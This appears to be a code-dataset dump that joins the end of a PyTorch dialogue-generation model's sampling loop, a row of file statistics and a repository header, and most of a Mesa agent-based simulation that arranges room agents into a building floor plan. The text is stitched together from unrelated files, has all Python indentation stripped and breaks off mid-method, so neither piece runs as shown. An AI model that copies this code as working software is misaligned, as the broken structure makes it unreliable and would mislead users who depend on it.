ctx_cell_mu_posterior, ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_outputs[:, i_ctx, :], context_h_cell, z_conv_expand[:, i_ctx, :])
z_ctx_cell = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
# z_ctx.append(z_ctx_cell)
# ctx_mu_prior.append(ctx_cell_mu_prior)
# ctx_var_prior.append(ctx_cell_var_prior)
# ctx_mu_posterior.append(ctx_cell_mu_posterior)
# ctx_var_posterior.append(ctx_cell_var_posterior)
# context_outputs.append(context_h_cell)
# Only the last step of the loop is kept here:
# context_outputs: [batch_size, context_size]
# z_ctx: [batch_size, z_ctx_size]
context_outputs = context_h_cell
z_ctx = z_ctx_cell
# ctx_mu_prior = torch.stack(ctx_mu_prior,1)
# ctx_var_prior = torch.stack(ctx_var_prior,1)
# ctx_mu_posterior = torch.stack(ctx_mu_posterior,1)
# ctx_var_posterior = torch.stack(ctx_var_posterior,1)
# z_ctx = torch.stack(z_ctx,1)
"""stop here"""
# Run for generation
for j in range(self.config.n_sample_step):
# context_outputs: [batch_size, context_hidden_size * direction]
context_outputs = context_outputs.squeeze(1)
mu_prior, var_prior = self.sent_prior(context_outputs, z_conv, z_ctx)
eps = to_var(torch.randn((batch_size, self.config.z_sent_size)))
z_sent = mu_prior + torch.sqrt(var_prior) * eps
latent_context = torch.cat([context_outputs, z_sent, z_conv, z_ctx], 1)
decoder_init = self.context2decoder(latent_context)
decoder_init = decoder_init.view(self.decoder.num_layers, -1, self.decoder.hidden_size)
if self.config.sample:
prediction = self.decoder(None, decoder_init, decode=True)
p = prediction.data.cpu().numpy()
length = torch.from_numpy(np.where(p == EOS_ID)[1])
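# np.where(p == EOS_ID)[1] collects the column index of every EOS hit; this
# implicitly assumes one EOS per sampled row, otherwise lengths misalign
# with the batch.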
else:
prediction, final_score, length = self.decoder.beam_decode(init_h=decoder_init)
# prediction: [batch_size, seq_len]
prediction = prediction[:, 0, :]
# length: [batch_size]
length = [l[0] for l in length]
length = to_var(torch.LongTensor(length))
samples.append(prediction)
encoder_outputs, encoder_hidden = self.encoder(prediction,
length)
encoder_hidden = encoder_hidden.transpose(1, 0).contiguous().view(batch_size, -1)
"""edit here"""
context_cell_input = torch.cat([encoder_hidden, z_conv, z_ctx], 1)
context_h_cell = self.context2context(
context_cell_input,
hidden=context_outputs)
# The freshly generated utterance forms a length-1 sequence, so the
# context-inference GRU gets a 3-D input and per-example length 1 (the
# original torch.LongTensor(batch_size) call produced an uninitialized tensor).
ctx_inference_outputs, ctx_inference_hidden = self.context_inference(encoder_hidden.unsqueeze(1),
to_var(torch.LongTensor([1] * batch_size)))
ctx_inference_hidden = ctx_inference_hidden.transpose(
1, 0).contiguous().view(batch_size, -1)
ctx_cell_mu_posterior, ctx_cell_var_posterior = self.ctx_posterior(ctx_inference_hidden, context_h_cell, z_conv)
z_ctx = ctx_cell_mu_posterior + torch.sqrt(ctx_cell_var_posterior) * ctx_eps
context_outputs = context_h_cell
"""END EDIT"""
samples = torch.stack(samples, 1)
return samples
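# ---------------------------------------------------------------------------
# Minimal standalone sketch (not part of the model above): the reparameterized
# sampling and diagonal-Gaussian KL pattern this file uses at the conversation,
# context, and sentence levels. The _demo_* names are illustrative only and
# assume torch is imported at the top of this module.
# ---------------------------------------------------------------------------
def _demo_reparameterize(mu, var):
# Draw z = mu + sqrt(var) * eps with eps ~ N(0, I), mirroring the z_conv,
# z_ctx and z_sent sampling above.
eps = torch.randn(mu.size())
return mu + torch.sqrt(var) * eps
def _demo_gaussian_kl(mu_q, var_q, mu_p, var_p):
# Closed-form KL(N(mu_q, var_q) || N(mu_p, var_p)) for diagonal Gaussians,
# the quantity normal_kl_div is assumed to compute.
return 0.5 * torch.sum(torch.log(var_p / var_q) + (var_q + (mu_q - mu_p) ** 2) / var_p - 1.0)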
| 53.78513 | 187 | 0.560678 | 7,894 | 72,341 | 4.758677 | 0.028756 | 0.054332 | 0.033036 | 0.025715 | 0.950299 | 0.935152 | 0.922375 | 0.91351 | 0.904219 | 0.891548 | 0 | 0.006516 | 0.359367 | 72,341 | 1,344 | 188 | 53.825149 | 0.804052 | 0.148519 | 0 | 0.844244 | 0 | 0 | 0.00028 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028217 | false | 0 | 0.007901 | 0.002257 | 0.068849 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
ab2da927bbfe458cc90d9ba421237029a908aed0 | 60,917 | py | Python | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | abm_project/model.py | Trippasch/ABM_Building_Model | a99e9f8f97f8abc2e6b4652d215890cf612bbdf5 | [
"MIT"
] | null | null | null | from mesa import Agent, Model
from abm_project.attractor import Attractor
from mesa.time import SimultaneousActivation
from mesa.space import SingleGrid
from mesa.datacollection import DataCollector
import random
class BuildingModel(Model):
"""
A model representing a building with some number of rooms (agents)
"""
description = ("A model representing a building with some number of different types of rooms (agents)"
+" being attracted to each other based on some set of complicated rules."
+"The result of the model is the best possible plan view of the building according to these rules.")
def __init__(
self,
width=20,
height=20,
N=500,
sl1_rooms=1,
sl_rooms=2,
sl_width=5.14,
sl_height=3.5,
wc1_rooms=1,
wc_rooms=1,
wc_width=4,
wc_height=1.5,
liv_rooms=1,
liv_width=7.77,
liv_height=4.5,
entry_rooms=1,
entry_width=2.66,
entry_height=1.5,
kit_rooms=1,
kit_width=4.5,
kit_height=4,
off_rooms=1,
off_width=3,
off_height=3.33,
corr_rooms=1,
corr_width=1,
corr_height=12,
bath_rooms=1,
bath_width=4,
bath_height=2,
):
# Set parameters
self.N = N
self.sl1_rooms = sl1_rooms
self.sl_rooms = sl_rooms
self.sl_width = sl_width
self.sl_height = sl_height
self.wc1_rooms = wc1_rooms
self.wc_rooms = wc_rooms
self.wc_width = wc_width
self.wc_height = wc_height
self.liv_rooms = liv_rooms
self.liv_width = liv_width
self.liv_height = liv_height
self.entry_rooms = entry_rooms
self.entry_width = entry_width
self.entry_height = entry_height
self.kit_rooms = kit_rooms
self.kit_width = kit_width
self.kit_height = kit_height
self.off_rooms = off_rooms
self.off_width = off_width
self.off_height = off_height
self.corr_rooms = corr_rooms
self.corr_width = corr_width
self.corr_height = corr_height
self.bath_rooms = bath_rooms
self.bath_width = bath_width
self.bath_height = bath_height
self.width = width
self.height = height
self.torus = False
self.reset_const = 1
self.c = 0
self.num_agents = (sl_rooms + wc_rooms
+ sl1_rooms + wc1_rooms
+ liv_rooms + entry_rooms
+ kit_rooms + off_rooms
+ corr_rooms + bath_rooms)
self.agents = []
self.current_id = 0
self.grid = SingleGrid(width, height, self.torus)
self.schedule = SimultaneousActivation(self)
self.stable_pos = 0
self.datacollector = DataCollector(
model_reporters={
"Number of Rooms": lambda x: x.num_agents,
"SL Rooms": lambda x: x.sl_rooms,
"SL1 Rooms": lambda x: x.sl1_rooms,
"WC Rooms": lambda x: x.wc_rooms,
"WC1 Rooms": lambda x: x.wc1_rooms,
},
agent_reporters={
"SL Posistion": lambda x: x.pos,
"SL1 Position": lambda x: x.pos
},
)
self.reset = False
self.make_agents()
self.running = True
self.datacollector.collect(self)
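# The ten placement blocks in make_agents below all repeat one pattern:
# sample a random in-bounds cell, then accept it only if the candidate room
# clears every room already placed. A hedged sketch of that shared overlap
# predicate (_fits_at is illustrative, not part of the original code):
def _fits_at(self, x, y, w, h):
# True when a w-by-h room centred at (x, y) would overlap no placed agent;
# two axis-aligned boxes overlap iff they overlap on both axes.
for agent in self.agents:
if (abs(x - agent.x) <= int(agent.agent_width / 2) + int(w / 2)
and abs(y - agent.y) <= int(agent.agent_height / 2) + int(h / 2)):
return False
return True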
def make_agents(self):
# Create Sleeping Rooms(1)
# Place agents with dimensions
i = 0
while 1:
if i == self.sl1_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.sl_width / 2), self.grid.width - int(self.sl_width / 2), 1)
y = self.random.randrange(int(self.sl_height / 2), self.grid.height - int(self.sl_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
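# check_pos counts how many placed agents this candidate clears; the spot is
# accepted below only when every existing agent is cleared
# (check_pos == len(self.agents)).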
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.sl_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.sl_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.sl_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.sl_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.sl_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.sl_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms, self.sl_width, self.sl_height)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
i += 1
if len(self.agents) == 0:
sl1room = SL1RoomAgent(self.next_id(), pos, self, True, self.sl1_rooms, self.sl_width, self.sl_height)
self.agents.append(sl1room)
self.schedule.add(sl1room)
self.grid.place_agent(sl1room, pos)
i += 1
# Create Sleeping Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.sl_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.sl_width / 2), self.grid.width - int(self.sl_width / 2), 1)
y = self.random.randrange(int(self.sl_height / 2), self.grid.height - int(self.sl_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.sl_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.sl_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.sl_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.sl_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.sl_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.sl_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms, self.sl_width, self.sl_height)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
i += 1
if len(self.agents) == 0:
slroom = SLRoomAgent(self.next_id(), pos, self, True, self.sl_rooms, self.sl_width, self.sl_height)
self.agents.append(slroom)
self.schedule.add(slroom)
self.grid.place_agent(slroom, pos)
i += 1
# Create WC Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.wc_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.wc_width / 2), self.grid.width - int(self.wc_width / 2), 1)
y = self.random.randrange(int(self.wc_height / 2), self.grid.height - int(self.wc_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.wc_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.wc_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.wc_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.wc_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.wc_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.wc_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms, self.wc_width, self.wc_height)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
i += 1
if len(self.agents) == 0:
wcroom = WCRoomAgent(self.next_id(), pos, self, True, self.wc_rooms, self.wc_width, self.wc_height)
self.agents.append(wcroom)
self.schedule.add(wcroom)
self.grid.place_agent(wcroom, pos)
i += 1
# Create WC Rooms(1)
# Place agents with dimensions
i = 0
while 1:
if i == self.wc1_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.wc_width / 2), self.grid.width - int(self.wc_width / 2), 1)
y = self.random.randrange(int(self.wc_height / 2), self.grid.height - int(self.wc_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.wc_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.wc_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.wc_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.wc_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.wc_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.wc_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms, self.wc_width, self.wc_height)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
i += 1
if len(self.agents) == 0:
wc1room = WC1RoomAgent(self.next_id(), pos, self, True, self.wc1_rooms, self.wc_width, self.wc_height)
self.agents.append(wc1room)
self.schedule.add(wc1room)
self.grid.place_agent(wc1room, pos)
i += 1
# Create Living Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.liv_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.liv_width / 2), self.grid.width - int(self.liv_width / 2), 1)
y = self.random.randrange(int(self.liv_height / 2), self.grid.height - int(self.liv_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.liv_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.liv_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.liv_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.liv_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.liv_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.liv_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms, self.liv_width, self.liv_height)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
i += 1
if len(self.agents) == 0:
livroom = LivRoomAgent(self.next_id(), pos, self, True, self.liv_rooms, self.liv_width, self.liv_height)
self.agents.append(livroom)
self.schedule.add(livroom)
self.grid.place_agent(livroom, pos)
i += 1
# Create Entries
# Place agents with dimensions
i = 0
while 1:
if i == self.entry_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.entry_width / 2), self.grid.width - int(self.entry_width / 2), 1)
y = self.random.randrange(int(self.entry_height / 2), self.grid.height - int(self.entry_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.entry_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.entry_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.entry_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.entry_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.entry_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.entry_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
entryroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms, self.entry_width, self.entry_height)
self.agents.append(entryroom)
self.schedule.add(entryroom)
self.grid.place_agent(entryroom, pos)
i += 1
if len(self.agents) == 0:
entryroom = EntryRoomAgent(self.next_id(), pos, self, True, self.entry_rooms, self.entry_width, self.entry_height)
self.agents.append(entryroom)
self.schedule.add(entryroom)
self.grid.place_agent(entryroom, pos)
i += 1
# Create Kitchens
# Place agents with dimensions
i = 0
while 1:
if i == self.kit_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.kit_width / 2), self.grid.width - int(self.kit_width / 2), 1)
y = self.random.randrange(int(self.kit_height / 2), self.grid.height - int(self.kit_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.kit_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.kit_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.kit_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.kit_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.kit_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.kit_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms, self.kit_width, self.kit_height)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
i += 1
if len(self.agents) == 0:
kitroom = KitRoomAgent(self.next_id(), pos, self, True, self.kit_rooms, self.kit_width, self.kit_height)
self.agents.append(kitroom)
self.schedule.add(kitroom)
self.grid.place_agent(kitroom, pos)
i += 1
# Create Office Rooms
# Place agents with dimensions
i = 0
while 1:
if i == self.off_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.off_width / 2), self.grid.width - int(self.off_width / 2), 1)
y = self.random.randrange(int(self.off_height / 2), self.grid.height - int(self.off_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.off_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.off_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.off_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.off_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.off_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.off_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms, self.off_width, self.off_height)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
i += 1
if len(self.agents) == 0:
offroom = OffRoomAgent(self.next_id(), pos, self, True, self.off_rooms, self.off_width, self.off_height)
self.agents.append(offroom)
self.schedule.add(offroom)
self.grid.place_agent(offroom, pos)
i += 1
# Create Corridors
# Place agents with dimensions
i = 0
while 1:
if i == self.corr_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.corr_width / 2), self.grid.width - int(self.corr_width / 2), 1)
y = self.random.randrange(int(self.corr_height / 2), self.grid.height - int(self.corr_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.corr_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.corr_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.corr_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.corr_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.corr_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.corr_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms, self.corr_width, self.corr_height)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
i += 1
if len(self.agents) == 0:
corrroom = CorrRoomAgent(self.next_id(), pos, self, True, self.corr_rooms, self.corr_width, self.corr_height)
self.agents.append(corrroom)
self.schedule.add(corrroom)
self.grid.place_agent(corrroom, pos)
i += 1
# Create Baths
# Place agents with dimensions
i = 0
while 1:
if i == self.bath_rooms:
break
# Add the agent to a random grid cell
x = self.random.randrange(int(self.bath_width / 2), self.grid.width - int(self.bath_width / 2), 1)
y = self.random.randrange(int(self.bath_height / 2), self.grid.height - int(self.bath_height / 2), 1)
pos = (x, y)
# Check position
check_pos = 0
for agent in self.agents:
if self.grid.is_cell_empty(pos):
if (x >= agent.x - int(agent.agent_width / 2) - int(self.bath_width / 2)
and x <= agent.x + int(agent.agent_width / 2) + int(self.bath_width / 2)):
if abs(y - agent.y) > int(agent.agent_height / 2) + int(self.bath_height / 2):
check_pos += 1
elif (y >= agent.y - int(agent.agent_height / 2) - int(self.bath_height / 2)
and y <= agent.y + int(agent.agent_height / 2) + int(self.bath_height / 2)):
if abs(x - agent.x) > int(agent.agent_width / 2) + int(self.bath_width / 2):
check_pos += 1
else:
check_pos += 1
if check_pos == len(self.agents):
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms, self.bath_width, self.bath_height)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
i += 1
if len(self.agents) == 0:
bathroom = BathRoomAgent(self.next_id(), pos, self, True, self.bath_rooms, self.bath_width, self.bath_height)
self.agents.append(bathroom)
self.schedule.add(bathroom)
self.grid.place_agent(bathroom, pos)
i += 1
def step(self):
"""
Run one step of the model. If all agents are stable, halt the model.
"""
# Reset counter of stable_pos
self.stable_pos = 0
# tell all the agents in the model to run their step function
self.schedule.step()
# collect data
self.datacollector.collect(self)
print("--stable_pos : ", self.stable_pos)
# stabilize the model if counter reaches the total number of agents
if self.stable_pos == self.schedule.get_agent_count():
self.running = False
# every N steps, flag the model for a reset if it has not stabilized yet
if self.schedule.steps == self.N * self.reset_const:
print(self.schedule.steps)
self.reset = True
class SL1RoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore=True, sl1_rooms=1, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.sl1_rooms = sl1_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_sl1 = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
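# Each pull below fires with a fixed chance: randint(1, n) == n is a 1-in-n
# event, so randint(1, 1) == 1 applies the pull on every step.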
# Grid attraction
if self.sl1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.sl1_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
self.agent_attraction(agent)
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_sl1 = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is WCRoomAgent:
# self.stable_sl1 += 1
# if type(i) is CorrRoomAgent:
# self.stable_sl1 += 1
# Stabilize agents with dimensions
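# Two rooms count as adjacent when their centre distance along one axis
# equals the sum of their half-extents plus one grid cell, i.e. the rooms
# sit flush against each other on the grid.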
for agent in self.model.agents:
if type(agent) is WCRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
elif type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl1 += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl1 += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_sl1 == 2:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class SLRoomAgent(Attractor):
"""
An agent representing a Sleeping room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore=True, sl_rooms=2, agent_width=6, agent_height=3, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.sl_rooms = sl_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_sl = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.sl_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.sl_rooms > 0:
if random.randint(1,4) == 4:
self.north_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.south_pole()
if random.randint(1,1) == 1:
self.east_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_sl = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
# if type(i) is CorrRoomAgent:
# self.stable_sl += 1
# Stabilize agents with dimensions
for agent in self.model.agents:
if type(agent) is CorrRoomAgent:
if (self.y >= agent.y - int(agent.agent_height / 2) - int(self.agent_height / 2)
and self.y <= agent.y + int(agent.agent_height / 2) + int(self.agent_height / 2)):
if abs(agent.x - self.x) == int(agent.agent_width / 2) + int(self.agent_width / 2) + 1:
self.stable_sl += 1
elif (self.x >= agent.x - int(agent.agent_width / 2) - int(self.agent_width / 2)
and self.x <= agent.x + int(agent.agent_width / 2) + int(self.agent_width / 2)):
if abs(agent.y - self.y) == int(agent.agent_height / 2) + int(self.agent_height / 2) + 1:
self.stable_sl += 1
# shortest path finder algorithm
self.astar_algorithm(agent)
self.astar_attraction(agent)
if self.stable_sl == 1:
self.model.stable_pos += 1
self.state = self.STABLED
else:
self.state = self.MOVED
class WC1RoomAgent(Attractor):
"""
An agent representing a WC room with some fixed variables
"""
moore = True
STABLED = 0
MOVED = 1
def __init__(self, unique_id, pos, model, moore = True, wc1_rooms=1, agent_width=3, agent_height=2, init_state=STABLED):
super().__init__(unique_id, pos, model, moore=moore)
self.wc1_rooms = wc1_rooms
self.agent_width = agent_width
self.agent_height = agent_height
self.pos = pos
self.x, self.y = pos
self.moore = moore
self.state = init_state
self.next_state = None
self.moved = 0
self.stable_wc1 = 0
self.astar_path = []
# step is called for each agent in model.BuildingModel.schedule.step()
def step(self):
self.next_state = self.state
if self.next_state == self.MOVED:
# Grid attraction
if self.wc1_rooms > 0:
if random.randint(1, 20) == 20:
self.grid_attraction_5()
if random.randint(1, 4) == 4:
self.grid_attraction_25()
if random.randint(1, 1) == 1:
self.grid_attraction_70()
# Poles attraction
if self.wc1_rooms > 0:
if random.randint(1,4) == 4:
self.south_pole()
if random.randint(1,3) == 3:
self.west_pole()
if random.randint(1,2) == 2:
self.east_pole()
if random.randint(1,1) == 1:
self.north_pole()
# Agents attraction
if random.randint(1, 1) == 1:
for agent in self.model.agents:
if type(agent) is OffRoomAgent:
self.agent_attraction(agent)
# General attraction
if self.model.num_agents > 0:
if random.randint(1, 7) == 7:
for agent in self.model.agents:
if agent is not self:
self.agent_attraction(agent)
# Apply the changes made in step()
def advance(self):
self.stable_wc1 = 0
# Stabilize agents without dimensions
# neighbors = self.model.grid.get_neighbors((self.x, self.y), moore=True, include_center=False, radius=1)
# for i in neighbors:
